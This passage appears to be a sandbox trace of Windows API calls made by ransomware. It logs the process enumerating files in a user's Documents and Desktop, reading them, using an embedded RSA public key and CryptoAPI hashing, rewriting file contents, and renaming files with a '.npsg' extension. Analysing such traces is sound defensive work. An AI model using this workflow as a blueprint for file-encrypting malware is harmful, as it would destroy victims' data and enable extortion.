RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400230 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.530] GetCurrentThreadId () returned 0x5b4 [0236.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688c60 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.531] GetCurrentThreadId () returned 0x5b4 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400230 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001d0 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001e8 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001b8 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400248 [0236.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400218 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400200 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400260 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400200 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400218 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001d0 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400230 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400260 | out: hHeap=0x620000) returned 1 [0236.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.534] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18412, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.534] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.535] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.535] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.535] CloseHandle (hObject=0x644) returned 1 [0236.537] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_0O68mwK4x9FM24.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_0o68mwk4x9fm24.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_0O68mwK4x9FM24.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_0o68mwk4x9fm24.avi.npsg")) returned 1 [0236.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.538] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.540] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1746f7f0, ftCreationTime.dwHighDateTime=0x1d5bf55, ftLastAccessTime.dwLowDateTime=0x6b920870, ftLastAccessTime.dwHighDateTime=0x1d5ba20, ftLastWriteTime.dwLowDateTime=0x6b920870, ftLastWriteTime.dwHighDateTime=0x1d5ba20, nFileSizeHigh=0x0, nFileSizeLow=0x18412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_0O68mwK4x9FM24.avi", cAlternateFileName="_0O68M~1.AVI")) returned 0 [0236.540] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0236.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0236.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.540] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.540] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.540] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0236.540] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.540] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.540] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.540] PathFindFileNameW (pszPath="") returned="" [0236.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa37dd110, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa37dd110, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0236.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.541] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa37dd110, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa37dd110, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.541] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c806700, ftCreationTime.dwHighDateTime=0x1d5c3bf, ftLastAccessTime.dwLowDateTime=0x5cdf5520, ftLastAccessTime.dwHighDateTime=0x1d58da8, ftLastWriteTime.dwLowDateTime=0x5cdf5520, ftLastWriteTime.dwHighDateTime=0x1d58da8, nFileSizeHigh=0x0, nFileSizeLow=0x1406c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-_F3s.xlsx", cAlternateFileName="-_F3S~1.XLS")) returned 1 [0236.541] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_F3s.xlsx") returned=".xlsx" [0236.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_F3s.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_f3s.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.543] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=82028) returned 1 [0236.543] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.546] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14046, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.546] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.548] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1406c, lpOverlapped=0x0) returned 1 [0236.550] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.550] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.550] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.550] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.564] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.564] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.564] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.565] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.565] GetLastError () returned 0x0 [0236.565] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.565] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.565] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.565] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.565] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14070) returned 0x3b95d50 [0236.566] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95428 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001a0 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95470 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001b8 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001e8 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400248 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400200 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.566] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400248 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400248 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400200 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34001e8 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400248 | out: hHeap=0x620000) returned 1 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.568] GetCurrentThreadId () returned 0x5b4 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688cf0 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.568] GetCurrentThreadId () returned 0x5b4 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.569] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1406c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.569] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, 